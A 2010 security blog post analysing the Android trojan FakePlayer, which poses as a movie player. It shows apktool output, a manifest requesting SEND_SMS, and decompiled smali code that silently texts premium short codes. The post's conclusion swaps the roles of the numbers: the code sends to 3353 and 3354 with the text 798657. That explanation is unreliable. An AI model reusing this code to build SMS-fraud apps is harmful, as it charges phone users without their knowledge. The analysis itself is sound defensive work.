Analysis of Trojan-SMS.AndroidOS.FakePlayer.a

August 4, 2010 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

Trojan-SMS.AndroidOS.FakePlayer.a is one of the first malicious programs detected on Android Smartphones.

The program camouflages itself to look like a media player application and begins sending SMS to premium numbers without the user’s knowledge.

To analyze the .APK android file we can use the android-apktool (http://code.google.com/p/android-apktool/) to decode the application resources and study the program behaviour.

Let’s start decoding the resources with apktool:

pc201166154132:fakeplayer jaimeblasco$ apktool d RU.apk 

I: Baksmaling…

I: Loading resource table…

I: Decoding resources…

I: Loading resource table from file: /Users/jaimeblasco/apktool/framework/1.apk

I: Copying assets and libs…

Apktool obtains the following files from the APK:

pc201166154132:fakeplayer jaimeblasco$ find ./

./

.//RU

.//RU/AndroidManifest.xml

.//RU/apktool.yml

.//RU/res

.//RU/res/drawable

.//RU/res/drawable/icon.png

.//RU/res/layout

.//RU/res/layout/main.xml

.//RU/res/values

.//RU/res/values/public.xml

.//RU/res/values/strings.xml

.//RU/smali

.//RU/smali/org

.//RU/smali/org/me

.//RU/smali/org/me/androidapplication1

.//RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali

.//RU/smali/org/me/androidapplication1/DataHelper.smali

.//RU/smali/org/me/androidapplication1/HelloWorld.smali

.//RU/smali/org/me/androidapplication1/MoviePlayer.smali

.//RU/smali/org/me/androidapplication1/R$attr.smali

.//RU/smali/org/me/androidapplication1/R$drawable.smali

.//RU/smali/org/me/androidapplication1/R$layout.smali

.//RU/smali/org/me/androidapplication1/R$string.smali

.//RU/smali/org/me/androidapplication1/R.smali



If we open the file RU/AndroidManifest.xml we can see that the application request the android permission android.permission.SEND_SMS when it is installed.



?xml version="1.0" encoding="UTF-8"?

manifest package="org.me.androidapplication1"

  xmlns:android="http://schemas.android.com/apk/res/android"

    application android:icon="@drawable/icon"

        activity android:label="Movie Player" android:name=".MoviePlayer"

            intent-filter

                action android:name="android.intent.action.MAIN" 

                category android:name="android.intent.category.LAUNCHER"

            intent-filter

        activity

    application

    uses-permission android:name="android.permission.SEND_SMS"



We observe that the application does some SQLite operations on /RU/smali/org/me/androidapplication1/DataHelper$OpenHelper.smali:



# static fields

.field private static final DATABASE_NAME:Ljava/lang/String; = "movieplayer.db"



.field private static final DATABASE_VERSION:I = 0x1



.field private static final INSERT:Ljava/lang/String; = "insert into table1(was) values (\'was\')"



.field private static final TABLE_NAME:Ljava/lang/String; = "table1"



The interesting operations can be found in RU/smali/org/me/androidapplication1/HelloWorld.smali:



    .line 28

    .local v0, m:Landroid/telephony/SmsManager;

    const-string v1, "3353"



    .line 29

    .local v1, destination:Ljava/lang/String;

    const-string v3, "798657"



    .line 31

    .local v3, text:Ljava/lang/String;

    const/4 v2, 0x0



    const/4 v4, 0x0



    const/4 v5, 0x0



    :try_start_0

    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V

    :try_end_0

    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0



    .line 37

    :goto_0

    const-string v1, "3354"



    .line 39

    const/4 v2, 0x0



    const/4 v4, 0x0



    const/4 v5, 0x0



    :try_start_1

    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V

    :try_end_1

    .catch Ljava/lang/Exception; {:try_start_1 .. :try_end_1} :catch_1



The application uses the sendTextMessage function from the Android API:

public final void  sendTextMessage  (String destinationAddress, String scAddress, String text, PendingIntent sentIntent, PendingIntent deliveryIntent)  

So, the malicious program tries to send SMS’s to destination 798657 using the service center addresses (SMSC) 3353 and 3354.

As we can see, this is a very simple piece of malware and it hasn’t got spreading capabilities so the risk is low because it wasn’t on Android Market.

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL